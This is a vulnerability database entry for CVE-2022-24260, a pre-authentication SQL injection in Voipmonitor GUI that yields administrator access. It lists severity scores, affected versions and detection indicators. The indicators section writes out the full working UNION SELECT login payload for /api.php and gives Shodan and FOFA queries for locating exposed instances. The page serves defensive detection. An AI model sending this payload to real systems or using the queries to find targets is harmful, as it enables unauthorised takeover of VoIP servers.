cbcvebase.
CVE-2022-24260
published 2022-02-04

CVE-2022-24260: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
50.93%
98.8th percentile
A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.

Affected

1 ranges
VendorProductVersion rangeFixed in
voipmonitorvoipmonitor< 24.9624.96

Detection & IOCsextracted from sources · hover to see the quote

url/api.php
commandmodule=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #
  • Detect exploitation attempts by monitoring POST requests to /api.php with the 'module=relogin' and 'action=login' parameters containing a UNION SELECT SQL injection payload in the 'user' field.
  • A successful exploitation response will contain both '"success":true' and '_vm_version' and '_debug' in the HTTP response body with a 200 status code.
  • Identify exposed VoipMonitor instances via Shodan query 'http.title:"VoIPmonitor"' or FOFA query 'title="voipmonitor"' as potential targets for this pre-auth SQL injection.
  • The Content-Type header 'application/x-www-form-urlencoded' is used in the exploit POST request to /api.php; monitor for anomalous UNION SELECT payloads in form-encoded login requests.
  • ·The vulnerability affects VoipMonitor GUI versions before v24.96 only; patched instances (v24.96+) are not vulnerable.
  • ·The UNION SELECT payload uses 92 columns; the exact column count may vary if the underlying database schema differs across deployments, potentially requiring payload adjustment.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.